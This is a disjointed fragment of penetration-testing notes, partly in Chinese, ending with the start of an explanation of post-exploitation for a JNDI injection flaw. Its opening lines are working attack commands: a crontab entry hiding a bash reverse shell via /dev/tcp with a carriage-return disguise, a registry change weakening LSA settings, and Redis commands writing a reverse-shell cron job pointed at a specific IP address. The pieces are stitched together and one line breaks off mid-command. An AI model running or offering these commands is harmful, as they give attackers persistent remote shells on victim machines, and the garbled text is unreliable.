(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/Attack-IP/PORT;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")
Victim Machine shell REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f shell REG query "HKLM\
cron set 4a "\n\n*/1 * * * * bash -i >& /dev/tcp/120.79.51.115/91 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save webshell #
作为一个2年多前的漏洞,慢慢也开始替代shiro反序列化漏洞出现在各个攻防的场景,就该漏洞的后利用作出描述。 漏洞原理 JNDI 全称为:Java Naming and Directory Interface ,java命名和目录接口,刚开始我也始终不理解这个功能的含义,后面发现不必太过纠结于此,更